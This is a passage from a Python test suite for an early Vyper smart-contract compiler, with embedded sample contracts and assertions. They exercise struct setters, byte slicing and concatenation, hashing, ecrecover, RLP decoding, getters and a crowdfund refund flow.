foo: num[3]
bar: num[3][3]
def foo() -> num:
self.foo = [1, 2, 3]
return(self.foo[0] + self.foo[1] * 10 + self.foo[2] * 100)
def fop() -> num:
self.bar[0] = [1, 2, 3]
self.bar[1] = [4, 5, 6]
return self.bar[0][0] + self.bar[0][1] * 10 + self.bar[0][2] * 100 + \
self.bar[1][0] * 1000 + self.bar[1][1] * 10000 + self.bar[1][2] * 100000
def goo() -> num:
goo: num[3]
goo = [1, 2, 3]
return(goo[0] + goo[1] * 10 + goo[2] * 100)
def gop() -> num: # Following a standard naming scheme; nothing to do with the US republican party
gar: num[3][3]
gar[0] = [1, 2, 3]
gar[1] = [4, 5, 6]
return gar[0][0] + gar[0][1] * 10 + gar[0][2] * 100 + \
gar[1][0] * 1000 + gar[1][1] * 10000 + gar[1][2] * 100000
def hoo() -> num:
self.foo = None
return(self.foo[0] + self.foo[1] * 10 + self.foo[2] * 100)
def hop() -> num:
self.bar[1] = None
return self.bar[0][0] + self.bar[0][1] * 10 + self.bar[0][2] * 100 + \
self.bar[1][0] * 1000 + self.bar[1][1] * 10000 + self.bar[1][2] * 100000
def joo() -> num:
goo: num[3]
goo = [1, 2, 3]
goo = None
return(goo[0] + goo[1] * 10 + goo[2] * 100)
def jop() -> num:
gar: num[3][3]
gar[0] = [1, 2, 3]
gar[1] = [4, 5, 6]
gar[1] = None
return gar[0][0] + gar[0][1] * 10 + gar[0][2] * 100 + \
gar[1][0] * 1000 + gar[1][1] * 10000 + gar[1][2] * 100000
"""
c = get_contract(multi_setter_test)
assert c.foo() == 321
assert c.fop() == 654321
assert c.goo() == 321
assert c.gop() == 654321
assert c.hoo() == 0
assert c.hop() == 321
assert c.joo() == 0
assert c.jop() == 321
print('Passed multi-setter literal test')
def test_multi_setter_struct_test():
multi_setter_struct_test = """
foo: {foo: num, bar: num}[3]
z: {foo: num[3], bar: {a: num, b: num}[2]}[2]
def foo() -> num:
self.foo[0] = {foo: 1, bar: 2}
self.foo[1] = {foo: 3, bar: 4}
self.foo[2] = {foo: 5, bar: 6}
return self.foo[0].foo + self.foo[0].bar * 10 + self.foo[1].foo * 100 + \
self.foo[1].bar * 1000 + self.foo[2].foo * 10000 + self.foo[2].bar * 100000
def fop() -> num:
self.z = [{foo: [1, 2, 3], bar: [{a: 4, b: 5}, {a: 2, b: 3}]},
{foo: [6, 7, 8], bar: [{a: 9, b: 1}, {a: 7, b: 8}]}]
return self.z[0].foo[0] + self.z[0].foo[1] * 10 + self.z[0].foo[2] * 100 + \
self.z[0].bar[0].a * 1000 + self.z[0].bar[0].b * 10000 + self.z[0].bar[1].a * 100000 + self.z[0].bar[1].b * 1000000 + \
self.z[1].foo[0] * 10000000 + self.z[1].foo[1] * 100000000 + self.z[1].foo[2] * 1000000000 + \
self.z[1].bar[0].a * 10000000000 + self.z[1].bar[0].b * 100000000000 + \
self.z[1].bar[1].a * 1000000000000 + self.z[1].bar[1].b * 10000000000000
def goo() -> num:
goo: {foo: num, bar: num}[3]
goo[0] = {foo: 1, bar: 2}
goo[1] = {foo: 3, bar: 4}
goo[2] = {foo: 5, bar: 6}
return goo[0].foo + goo[0].bar * 10 + goo[1].foo * 100 + \
goo[1].bar * 1000 + goo[2].foo * 10000 + goo[2].bar * 100000
def gop() -> num:
zed = [{foo: [1, 2, 3], bar: [{a: 4, b: 5}, {a: 2, b: 3}]},
{foo: [6, 7, 8], bar: [{a: 9, b: 1}, {a: 7, b: 8}]}]
return zed[0].foo[0] + zed[0].foo[1] * 10 + zed[0].foo[2] * 100 + \
zed[0].bar[0].a * 1000 + zed[0].bar[0].b * 10000 + zed[0].bar[1].a * 100000 + zed[0].bar[1].b * 1000000 + \
zed[1].foo[0] * 10000000 + zed[1].foo[1] * 100000000 + zed[1].foo[2] * 1000000000 + \
zed[1].bar[0].a * 10000000000 + zed[1].bar[0].b * 100000000000 + \
zed[1].bar[1].a * 1000000000000 + zed[1].bar[1].b * 10000000000000
"""
c = get_contract(multi_setter_struct_test)
assert c.foo() == 654321
assert c.fop() == 87198763254321
assert c.goo() == 654321
assert c.gop() == 87198763254321
print('Passed multi-setter struct test')
def test_type_converter_setter_test():
type_converter_setter_test = """
mom: {a: {c: num}[3], b: num}
non: {a: {c: decimal}[3], b:num}
pop: decimal[2][2]
def foo() -> num:
self.mom = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
self.non = self.mom
return floor(self.non.a[0].c + self.non.a[1].c * 10 + self.non.a[2].c * 100 + self.non.b * 1000)
def goo() -> num:
self.pop = [[1, 2], [3, 4.0]]
return floor(self.pop[0][0] + self.pop[0][1] * 10 + self.pop[1][0] * 100 + self.pop[1][1] * 1000)
"""
c = get_contract(type_converter_setter_test)
assert c.foo() == 4321
assert c.foo() == 4321
print('Passed type-conversion struct test')
def test_composite_setter_test():
composite_setter_test = """
mom: {a: {c: num}[3], b:num}
qoq: {c: num}
def foo() -> num:
self.mom = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
non = {c: 5}
self.mom.a[0] = non
non = {c: 6}
self.mom.a[2] = non
return self.mom.a[0].c + self.mom.a[1].c * 10 + self.mom.a[2].c * 100 + self.mom.b * 1000
def fop() -> num:
popp = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
self.qoq = {c: 5}
popp.a[0] = self.qoq
self.qoq = {c: 6}
popp.a[2] = self.qoq
return popp.a[0].c + popp.a[1].c * 10 + popp.a[2].c * 100 + popp.b * 1000
def foq() -> num:
popp = {a: [{c: 1}, {c: 2}, {c: 3}], b: 4}
popp.a[0] = None
popp.a[2] = None
return popp.a[0].c + popp.a[1].c * 10 + popp.a[2].c * 100 + popp.b * 1000
"""
c = get_contract(composite_setter_test)
assert c.foo() == 4625
assert c.fop() == 4625
assert c.foq() == 4020
print('Passed composite struct test')
def test_crowdfund2():
crowdfund2 = """
funders: {sender: address, value: wei_value}[num]
nextFunderIndex: num
beneficiary: address
deadline: timestamp
goal: wei_value
refundIndex: num
timelimit: timedelta
def __init__(_beneficiary: address, _goal: wei_value, _timelimit: timedelta):
self.beneficiary = _beneficiary
self.deadline = block.timestamp + _timelimit
self.timelimit = _timelimit
self.goal = _goal
@payable
def participate():
assert block.timestamp < self.deadline
nfi = self.nextFunderIndex
self.funders[nfi] = {sender: msg.sender, value: msg.value}
self.nextFunderIndex = nfi + 1
@constant
def expired() -> bool:
return block.timestamp >= self.deadline
@constant
def timestamp() -> timestamp:
return block.timestamp
@constant
def deadline() -> timestamp:
return self.deadline
@constant
def timelimit() -> timedelta:
return self.timelimit
@constant
def reached() -> bool:
return self.balance >= self.goal
def finalize():
assert block.timestamp >= self.deadline and self.balance >= self.goal
selfdestruct(self.beneficiary)
def refund():
ind = self.refundIndex
for i in range(ind, ind + 30):
if i >= self.nextFunderIndex:
self.refundIndex = self.nextFunderIndex
return
send(self.funders[i].sender, self.funders[i].value)
self.funders[i] = None
self.refundIndex = ind + 30
"""
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=5)
assert c.timelimit() == 600
assert c.deadline() - c.timestamp() == 600
assert not c.expired()
assert not c.reached()
c.participate(value=49)
assert c.reached()
pre_bal = s.head_state.get_balance(t.a1)
s.head_state.timestamp += 1000
assert c.expired()
c.finalize()
post_bal = s.head_state.get_balance(t.a1)
assert post_bal - pre_bal == 54
c = get_contract(crowdfund2, args=[t.a1, 50, 600])
c.participate(value=1, sender=t.k3)
c.participate(value=2, sender=t.k4)
c.participate(value=3, sender=t.k5)
c.participate(value=4, sender=t.k6)
s.head_state.timestamp += 1000
assert c.expired()
assert not c.reached()
pre_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
c.refund()
post_bals = [s.head_state.get_balance(x) for x in [t.a3, t.a4, t.a5, t.a6]]
assert [y-x for x, y in zip(pre_bals, post_bals)] == [1, 2, 3, 4]
print('Passed second composite crowdfund test')
def test_test_bytes():
test_bytes = """
def foo(x: bytes <= 100) -> bytes <= 100:
return x
"""
c = get_contract(test_bytes)
moo_result = c.foo(b'cow')
assert moo_result == b'cow'
print('Passed basic bytes test')
assert c.foo(b'\x35' * 100) == b'\x35' * 100
print('Passed max-length bytes test')
try:
c.foo(b'\x35' * 101)
assert False
except:
pass
print('Passed input-too-long test')
def test_test_bytes2():
test_bytes2 = """
def foo(x: bytes <= 100) -> bytes <= 100:
y = x
return y
"""
c = get_contract(test_bytes2)
assert c.foo(b'cow') == b'cow'
assert c.foo(b'') == b''
assert c.foo(b'\x35' * 63) == b'\x35' * 63
assert c.foo(b'\x35' * 64) == b'\x35' * 64
assert c.foo(b'\x35' * 65) == b'\x35' * 65
print('Passed string copying test')
def test_test_bytes3():
test_bytes3 = """
x: num
maa: bytes <= 60
y: num
def __init__():
self.x = 27
self.y = 37
def set_maa(inp: bytes <= 60):
self.maa = inp
def set_maa2(inp: bytes <= 60):
ay = inp
self.maa = ay
def get_maa() -> bytes <= 60:
return self.maa
def get_maa2() -> bytes <= 60:
ay = self.maa
return ay
def get_xy() -> num:
return self.x * self.y
"""
c = get_contract(test_bytes3)
c.set_maa(b"pig")
assert c.get_maa() == b"pig"
assert c.get_maa2() == b"pig"
c.set_maa2(b"")
assert c.get_maa() == b""
assert c.get_maa2() == b""
c.set_maa(b"\x44" * 60)
assert c.get_maa() == b"\x44" * 60
assert c.get_maa2() == b"\x44" * 60
c.set_maa2(b"mongoose")
assert c.get_maa() == b"mongoose"
assert c.get_xy() == 999
print('Passed advanced string copying test')
def test_test_bytes4():
test_bytes4 = """
a: bytes <= 60
def foo(inp: bytes <= 60) -> bytes <= 60:
self.a = inp
self.a = None
return self.a
def bar(inp: bytes <= 60) -> bytes <= 60:
b = inp
b = None
return b
"""
c = get_contract(test_bytes4)
assert c.foo() == b"", c.foo()
assert c.bar() == b""
print('Passed string deleting test')
def test_test_bytes5():
test_bytes5 = """
g: {a: bytes <= 50, b: bytes <= 50}
def foo(inp1: bytes <= 40, inp2: bytes <= 45):
self.g = {a: inp1, b: inp2}
def check1() -> bytes <= 50:
return self.g.a
def check2() -> bytes <= 50:
return self.g.b
def bar(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
h = {a: inp1, b: inp2}
return h.a
def bat(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50:
h = {a: inp1, b: inp2}
return h.b
def quz(inp1: bytes <= 40, inp2: bytes <= 45):
h = {a: inp1, b: inp2}
self.g = h
"""
c = get_contract(test_bytes5)
c.foo(b"cow", b"horse")
assert c.check1() == b"cow"
assert c.check2() == b"horse"
assert c.bar(b"pig", b"moose") == b"pig"
assert c.bat(b"pig", b"moose") == b"moose"
c.quz(b"badminton", b"fluffysheep")
assert c.check1() == b"badminton"
assert c.check2() == b"fluffysheep"
print('Passed string struct test')
def test_test_slice():
test_slice = """
def foo(inp1: bytes <= 10) -> bytes <= 3:
x = 5
s = slice(inp1, start=3, len=3)
y = 7
return s
def bar(inp1: bytes <= 10) -> num:
x = 5
s = slice(inp1, start=3, len=3)
y = 7
return x * y
"""
c = get_contract(test_slice)
x = c.foo(b"badminton")
assert x == b"min", x
assert c.bar(b"badminton") == 35
print('Passed slice test')
def test_test_slice2():
test_slice2 = """
def slice_tower_test(inp1: bytes <= 50) -> bytes <= 50:
inp = inp1
for i in range(1, 11):
inp = slice(inp, start=1, len=30 - i * 2)
return inp
"""
c = get_contract_with_gas_estimation(test_slice2)
x = c.slice_tower_test(b"abcdefghijklmnopqrstuvwxyz1234")
assert x == b"klmnopqrst", x
print('Passed advanced slice test')
def test_test_slice3():
test_slice3 = """
x: num
s: bytes <= 50
y: num
def foo(inp1: bytes <= 50) -> bytes <= 50:
self.x = 5
self.s = slice(inp1, start=3, len=3)
self.y = 7
return self.s
def bar(inp1: bytes <= 50) -> num:
self.x = 5
self.s = slice(inp1, start=3, len=3)
self.y = 7
return self.x * self.y
"""
c = get_contract(test_slice3)
x = c.foo(b"badminton")
assert x == b"min", x
assert c.bar(b"badminton") == 35
print('Passed storage slice test')
def test_test_slice4():
test_slice4 = """
def foo(inp: bytes <= 10, start: num, len: num) -> bytes <= 10:
return slice(inp, start=start, len=len)
"""
c = get_contract(test_slice4)
assert c.foo(b"badminton", 3, 3) == b"min"
assert c.foo(b"badminton", 0, 9) == b"badminton"
assert c.foo(b"badminton", 1, 8) == b"adminton"
assert c.foo(b"badminton", 1, 7) == b"adminto"
assert c.foo(b"badminton", 1, 0) == b""
assert c.foo(b"badminton", 9, 0) == b""
try:
c.foo(b"badminton", 0, 10)
assert False
except:
pass
try:
c.foo(b"badminton", 1, 9)
assert False
except:
pass
try:
c.foo(b"badminton", 9, 1)
assert False
except:
pass
try:
c.foo(b"badminton", 10, 0)
assert False
except:
pass
print('Passed slice edge case test')
def test_test_length():
test_length = """
y: bytes <= 10
def foo(inp: bytes <= 10) -> num:
x = slice(inp, start=1, len=5)
self.y = slice(inp, start=2, len=4)
return len(inp) * 100 + len(x) * 10 + len(self.y)
"""
c = get_contract(test_length)
assert c.foo(b"badminton") == 954, c.foo(b"badminton")
print('Passed length test')
def test_test_concat():
test_concat = """
def foo2(input1: bytes <= 50, input2: bytes <= 50) -> bytes <= 1000:
return concat(input1, input2)
def foo3(input1: bytes <= 50, input2: bytes <= 50, input3: bytes <= 50) -> bytes <= 1000:
return concat(input1, input2, input3)
"""
c = get_contract(test_concat)
assert c.foo2(b"h", b"orse") == b"horse"
assert c.foo2(b"h", b"") == b"h"
assert c.foo2(b"", b"") == b""
assert c.foo2(b"", b"orse") == b"orse"
assert c.foo3(b"Buffalo", b" ", b"buffalo") == b"Buffalo buffalo"
assert c.foo2(b"\x36", b"\x35" * 32) == b"\x36" + b"\x35" * 32
assert c.foo2(b"\x36" * 48, b"\x35" * 32) == b"\x36" * 48 + b"\x35" * 32
assert c.foo3(b"horses" * 4, b"mice" * 7, b"crows" * 10) == b"horses" * 4 + b"mice" * 7 + b"crows" * 10
print('Passed simple concat test')
def test_test_concat2():
test_concat2 = """
def foo(inp: bytes <= 50) -> bytes <= 1000:
x = inp
return concat(x, inp, x, inp, x, inp, x, inp, x, inp)
"""
c = get_contract(test_concat2)
assert c.foo(b"horse" * 9 + b"viper") == (b"horse" * 9 + b"viper") * 10
print('Passed second concat test')
def test_crazy_concat_code():
crazy_concat_code = """
y: bytes <= 10
def krazykonkat(z: bytes <= 10) -> bytes <= 25:
x = "cow"
self.y = "horse"
return concat(x, " ", self.y, " ", z)
"""
c = get_contract(crazy_concat_code)
assert c.krazykonkat(b"moose") == b'cow horse moose'
print('Passed third concat test')
def test_string_literal_code():
string_literal_code = """
def foo() -> bytes <= 5:
return "horse"
def bar() -> bytes <= 10:
return concat("b", "a", "d", "m", "i", "", "nton")
def baz() -> bytes <= 40:
return concat("0123456789012345678901234567890", "12")
def baz2() -> bytes <= 40:
return concat("01234567890123456789012345678901", "12")
def baz3() -> bytes <= 40:
return concat("0123456789012345678901234567890", "1")
def baz4() -> bytes <= 100:
return concat("01234567890123456789012345678901234567890123456789",
"01234567890123456789012345678901234567890123456789")
"""
c = get_contract(string_literal_code)
assert c.foo() == b"horse"
assert c.bar() == b"badminton"
assert c.baz() == b"012345678901234567890123456789012"
assert c.baz2() == b"0123456789012345678901234567890112"
assert c.baz3() == b"01234567890123456789012345678901"
assert c.baz4() == b"0123456789" * 10
print("Passed string literal test")
def test_kode():
for i in range(95, 96, 97):
kode = """
moo: bytes <= 100
def foo(s: num, L: num) -> bytes <= 100:
x = 27
r = slice("%s", start=s, len=L)
y = 37
if x * y == 999:
return r
def bar(s: num, L: num) -> bytes <= 100:
self.moo = "%s"
x = 27
r = slice(self.moo, start=s, len=L)
y = 37
if x * y == 999:
return r
def baz(s: num, L: num) -> bytes <= 100:
x = 27
self.moo = slice("%s", start=s, len=L)
y = 37
if x * y == 999:
return self.moo
""" % (("c" * i), ("c" * i), ("c" * i))
c = get_contract(kode)
for e in range(63, 64, 65):
for _s in range(31, 32, 33):
o1 = c.foo(_s, e - _s)
o2 = c.bar(_s, e - _s)
o3 = c.baz(_s, e - _s)
assert o1 == o2 == o3 == b"c" * (e - _s), (i, _s, e - _s, o1, o2, o3)
print("Passed string literal splicing fuzz-test")
def test_hash_code():
hash_code = """
def foo(inp: bytes <= 100) -> bytes32:
return sha3(inp)
def bar() -> bytes32:
return sha3("inp")
"""
c = get_contract(hash_code)
for inp in (b"", b"cow", b"s" * 31, b"\xff" * 32, b"\n" * 33, b"g" * 64, b"h" * 65):
assert c.foo(inp) == u.sha3(inp)
assert c.bar() == u.sha3("inp")
def test_hash_code2():
hash_code2 = """
def foo(inp: bytes <= 100) -> bool:
return sha3(inp) == sha3("badminton")
"""
c = get_contract(hash_code2)
assert c.foo(b"badminto") is False
assert c.foo(b"badminton") is True
def test_hash_code3():
hash_code3 = """
test: bytes <= 100
def set_test(inp: bytes <= 100):
self.test = inp
def tryy(inp: bytes <= 100) -> bool:
return sha3(inp) == sha3(self.test)
def trymem(inp: bytes <= 100) -> bool:
x = self.test
return sha3(inp) == sha3(x)
def try32(inp: bytes32) -> bool:
return sha3(inp) == sha3(self.test)
"""
c = get_contract(hash_code3)
c.set_test(b"")
assert c.tryy(b"") is True
assert c.trymem(b"") is True
assert c.tryy(b"cow") is False
c.set_test(b"cow")
assert c.tryy(b"") is False
assert c.tryy(b"cow") is True
c.set_test(b"\x35" * 32)
assert c.tryy(b"\x35" * 32) is True
assert c.trymem(b"\x35" * 32) is True
assert c.try32(b"\x35" * 32) is True
assert c.tryy(b"\x35" * 33) is False
c.set_test(b"\x35" * 33)
assert c.tryy(b"\x35" * 32) is False
assert c.trymem(b"\x35" * 32) is False
assert c.try32(b"\x35" * 32) is False
assert c.tryy(b"\x35" * 33) is True
print("Passed SHA3 hash test")
def test_method_id_test():
method_id_test = """
def double(x: num) -> num:
return x * 2
def returnten() -> num:
ans = raw_call(self, concat(method_id("double(int128)"), as_bytes32(5)), gas=50000, outsize=32)
return as_num128(extract32(ans, 0))
"""
c = get_contract(method_id_test)
assert c.returnten() == 10
print("Passed method ID test")
def test_ecrecover_test():
ecrecover_test = """
def test_ecrecover(h: bytes32, v:num256, r:num256, s:num256) -> address:
return ecrecover(h, v, r, s)
def test_ecrecover2() -> address:
return ecrecover(0x3535353535353535353535353535353535353535353535353535353535353535,
as_num256(28),
as_num256(63198938615202175987747926399054383453528475999185923188997970550032613358815),
as_num256(6577251522710269046055727877571505144084475024240851440410274049870970796685))
"""
c = get_contract(ecrecover_test)
h = b'\x35' * 32
k = b'\x46' * 32
v, r, S = u.ecsign(h, k)
assert c.test_ecrecover(h, v, r, S) == '0x' + u.encode_hex(u.privtoaddr(k))
assert c.test_ecrecover2() == '0x' + u.encode_hex(u.privtoaddr(k))
print("Passed ecrecover test")
def test_extract32_code():
extract32_code = """
y: bytes <= 100
def extrakt32(inp: bytes <= 100, index: num) -> bytes32:
return extract32(inp, index)
def extrakt32_mem(inp: bytes <= 100, index: num) -> bytes32:
x = inp
return extract32(x, index)
def extrakt32_storage(index: num, inp: bytes <= 100) -> bytes32:
self.y = inp
return extract32(self.y, index)
"""
c = get_contract_with_gas_estimation(extract32_code)
test_cases = (
(b"c" * 31, 0),
(b"c" * 32, 0),
(b"c" * 32, -1),
(b"c" * 33, 0),
(b"c" * 33, 1),
(b"c" * 33, 2),
(b"cow" * 30, 0),
(b"cow" * 30, 1),
(b"cow" * 30, 31),
(b"cow" * 30, 32),
(b"cow" * 30, 33),
(b"cow" * 30, 34),
(b"cow" * 30, 58),
(b"cow" * 30, 59),
)
for S, i in test_cases:
expected_result = S[i: i + 32] if 0 <= i <= len(S) - 32 else None
if expected_result is None:
try:
o = c.extrakt32(S, i)
success = True
except:
success = False
assert not success
else:
assert c.extrakt32(S, i) == expected_result
assert c.extrakt32_mem(S, i) == expected_result
assert c.extrakt32_storage(i, S) == expected_result
print("Passed bytes32 extraction test")
def test_test_concat_bytes32():
test_concat_bytes32 = """
def sandwich(inp: bytes <= 100, inp2: bytes32) -> bytes <= 164:
return concat(inp2, inp, inp2)
def fivetimes(inp: bytes32) -> bytes <= 160:
return concat(inp, inp, inp, inp, inp)
"""
c = get_contract(test_concat_bytes32)
assert c.sandwich(b"cow", b"\x35" * 32) == b"\x35" * 32 + b"cow" + b"\x35" * 32, c.sandwich(b"cow", b"\x35" * 32)
assert c.sandwich(b"", b"\x46" * 32) == b"\x46" * 64
assert c.sandwich(b"\x57" * 95, b"\x57" * 32) == b"\x57" * 159
assert c.sandwich(b"\x57" * 96, b"\x57" * 32) == b"\x57" * 160
assert c.sandwich(b"\x57" * 97, b"\x57" * 32) == b"\x57" * 161
assert c.fivetimes(b"mongoose" * 4) == b"mongoose" * 20
print("Passed concat bytes32 test")
def test_test_wei():
test_wei = """
def return_2_finney() -> wei_value:
return as_wei_value(2, finney)
def return_3_finney() -> wei_value:
return as_wei_value(2 + 1, finney)
def return_2p5_ether() -> wei_value:
return as_wei_value(2.5, ether)
def return_3p5_ether() -> wei_value:
return as_wei_value(2.5 + 1, ether)
def return_2pow64_wei() -> wei_value:
return as_wei_value(18446744.073709551616, szabo)
"""
c = get_contract_with_gas_estimation(test_wei)
assert c.return_2_finney() == 2 * 10**15
assert c.return_3_finney() == 3 * 10**15, c.return_3_finney()
assert c.return_2p5_ether() == 2.5 * 10**18
assert c.return_3p5_ether() == 3.5 * 10**18
assert c.return_2pow64_wei() == 2**64
print("Passed wei value literals test")
def test_caller_code():
caller_code = """
def foo() -> bytes <= 7:
return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=5)
def bar() -> bytes <= 7:
return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=3)
def baz() -> bytes <= 7:
return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=7)
"""
c = get_contract(caller_code)
assert c.foo() == b"moose"
assert c.bar() == b"moo"
assert c.baz() == b"moose\x00\x00"
print('Passed raw call test')
def test_extract32_code():
extract32_code = """
def foo(inp: bytes <= 32) -> num:
return extract32(inp, 0, type=num128)
def bar(inp: bytes <= 32) -> num256:
return extract32(inp, 0, type=num256)
def baz(inp: bytes <= 32) -> bytes32:
return extract32(inp, 0, type=bytes32)
def fop(inp: bytes <= 32) -> bytes32:
return extract32(inp, 0)
def foq(inp: bytes <= 32) -> address:
return extract32(inp, 0, type=address)
"""
c = get_contract(extract32_code)
assert c.foo(b"\x00" * 30 + b"\x01\x01") == 257
assert c.bar(b"\x00" * 30 + b"\x01\x01") == 257
try:
c.foo(b"\x80" + b"\x00" * 30)
success = True
except:
success = False
assert not success
assert c.bar(b"\x80" + b"\x00" * 31) == 2**255
assert c.baz(b"crow" * 8) == b"crow" * 8
assert c.fop(b"crow" * 8) == b"crow" * 8
assert c.foq(b"\x00" * 12 + b"3" * 20) == "0x" + "3" * 40
try:
c.foq(b"crow" * 8)
success = True
except:
success = False
assert not success
print('Passed extract32 test')
def test_bytes_to_num_code():
bytes_to_num_code = """
def foo(x: bytes <= 32) -> num:
return bytes_to_num(x)
"""
c = get_contract(bytes_to_num_code)
assert c.foo(b"") == 0
try:
c.foo(b"\x00")
success = True
except:
success = False
assert not success
assert c.foo(b"\x01") == 1
try:
c.foo(b"\x00\x01")
success = True
except:
success = False
assert not success
assert c.foo(b"\x01\x00") == 256
assert c.foo(b"\x01\x00\x00\x00\x01") == 4294967297
assert c.foo(b"\xff" * 32) == -1
try:
c.foo(b"\x80" + b"\xff" * 31)
success = True
except:
success = False
try:
c.foo(b"\x01" * 33)
success = True
except:
success = False
print('Passed bytes_to_num tests')
def test_rlp_decoder_code():
import rlp
rlp_decoder_code = """
u: bytes <= 100
def foo() -> address:
x = RLPList('\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG', [address, bytes32])
return x[0]
def fop() -> bytes32:
x = RLPList('\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG', [address, bytes32])
return x[1]
def foq() -> bytes <= 100:
x = RLPList('\xc5\x83cow\x03', [bytes, num])
return x[0]
def fos() -> num:
x = RLPList('\xc5\x83cow\x03', [bytes, num])
return x[1]
def fot() -> num256:
x = RLPList('\xc5\x83cow\x03', [bytes, num256])
return x[1]
def qoo(inp: bytes <= 100) -> address:
x = RLPList(inp, [address, bytes32])
return x[0]
def qos(inp: bytes <= 100) -> num:
x = RLPList(inp, [num, num])
return x[0] + x[1]
def qot(inp: bytes <= 100):
x = RLPList(inp, [num, num])
def qov(inp: bytes <= 100):
x = RLPList(inp, [num256, num256])
def roo(inp: bytes <= 100) -> address:
self.u = inp
x = RLPList(self.u, [address, bytes32])
return x[0]
def too(inp: bytes <= 100) -> bool:
x = RLPList(inp, [bool])
return x[0]
def voo(inp: bytes <= 1024) -> num:
x = RLPList(inp, [num, num, bytes32, num, bytes32, bytes])
return x[1]
"""
c = get_contract(rlp_decoder_code)
assert c.foo() == '0x' + '35' * 20
assert c.fop() == b'G' * 32
assert c.foq() == b'cow'
assert c.fos() == 3
assert c.fot() == 3
assert c.qoo(b'\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG') == '0x' + '35' * 20
assert c.roo(b'\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG') == '0x' + '35' * 20
assert c.qos(rlp.encode([3, 30])) == 33
assert c.qos(rlp.encode([3, 2**100 - 5])) == 2**100 - 2
assert c.voo(rlp.encode([b'', b'\x01', b'\xbds\xc31\xf5=b\xa5\xcfy]\x0f\x05\x8f}\\\xf3\xe6\xea\x9d~\r\x96\xda\xdf:+\xdb4pm\xcc', b'', b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b:\xcd\x85\x9b\x84`FD\xf9\xa8'\x8ezR\xd5\xc9*\xf5W\x1f\x14\xc2\x0cd\xa0\x17\xd4Z\xde\x9d\xc2\x18_\x82B\xc2\xaa\x82\x19P\xdd\xa2\xd0\xe9(\xcaO\xe2\xb1\x13s\x05yS\xc3q\xdb\x1eB\xe2g\xaa'\xba"])) == 1
try:
c.qot(rlp.encode([7, 2**160]))
success = True
except:
success = False
assert not success
c.qov(rlp.encode([7, 2**160]))
try:
c.qov(rlp.encode([2**160]))
success = True
except:
success = False
assert not success
try:
c.qov(rlp.encode([b'\x03', b'\x00\x01']))
success = True
except:
success = False
assert not success
c.qov(rlp.encode([b'\x03', b'\x01']))
c.qov(rlp.encode([b'\x03', b'']))
try:
c.qov(rlp.encode([b'\x03', b'\x00']))
success = True
except:
success = False
assert not success
assert c.too(rlp.encode([b'\x01'])) is True
assert c.too(rlp.encode([b''])) is False
try:
c.too(rlp.encode([b'\x02']))
success = True
except:
success = False
assert not success
try:
c.too(rlp.encode([b'\x00']))
success = True
except:
success = False
assert not success
print('Passed RLP decoder tests')
def test_getter_code():
getter_code = """
x: public(wei_value)
y: public(num[5])
z: public(bytes <= 100)
w: public({
a: wei_value,
b: num[7],
c: bytes <= 100,
d: num[address],
e: num[3][3],
f: timestamp,
g: wei_value
}[num])
def __init__():
self.x = as_wei_value(7, wei)
self.y[1] = 9
self.z = "cow"
self.w[1].a = 11
self.w[1].b[2] = 13
self.w[1].c = "horse"
self.w[1].d[0x1234567890123456789012345678901234567890] = 15
self.w[2].e[1][2] = 17
self.w[3].f = 750
self.w[3].g = 751
"""
c = get_contract(getter_code)
assert c.get_x() == 7
assert c.get_y(1) == 9
assert c.get_z() == b"cow"
assert c.get_w__a(1) == 11
assert c.get_w__b(1, 2) == 13
assert c.get_w__c(1) == b"horse"
assert c.get_w__d(1, "0x1234567890123456789012345678901234567890") == 15
assert c.get_w__e(2, 1, 2) == 17
assert c.get_w__f(3) == 750
assert c.get_w__g(3) == 751
print('Passed getter tests')
def test_konkat_code():
konkat_code = """
ecks: bytes32
def foo(x: bytes32, y: bytes32) -> bytes <= 64:
selfecks = x
return concat(selfecks, y)
def goo(x: bytes32, y: bytes32) -> bytes <= 64:
self.ecks = x
return concat(self.ecks, y)
def hoo(x: bytes32, y: bytes32) -> bytes <= 64:
return concat(x, y)
"""
c = get_contract(konkat_code)
assert c.foo(b'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32
assert c.goo(b'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32
assert c.hoo(b'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32
print('Passed second concat tests')
def test_conditional_return_code():
conditional_return_code = """
def foo(i: bool) -> num:
if i:
return 5
else:
assert 2
return 7
return 11
"""
c = get_contract_with_gas_estimation(conditional_return_code)
assert c.foo(True) == 5
assert c.foo(False) == 7
print('Passed conditional return tests')
def test_large_input_code():
large_input_code = """
def foo(x: num) -> num:
return 3
"""
c = get_contract_with_gas_estimation(large_input_code)
c.foo(1274124)
c.foo(2**120)
try:
c.foo(2**130)
success = True
except:
success = False
assert not success
def test_large_input_code_2():
large_input_code_2 = """
def __init__(x: num):
y = x
def foo() -> num:
return 5
"""
c = get_contract(large_input_code_2, args=[17], sender=t.k0, value=0)
try:
c = get_contract(large_input_code_2, args=[2**130], sender=t.k0, value=0)
success = True
except:
success = False
assert not success
print('Passed invalid input tests')
def test_loggy_code():
loggy_code = """
s: bytes <= 100
def foo():
raw_log([], "moo")
def goo():
raw_log([0x1234567812345678123456781234567812345678123456781234567812345678], "moo2")
def hoo():
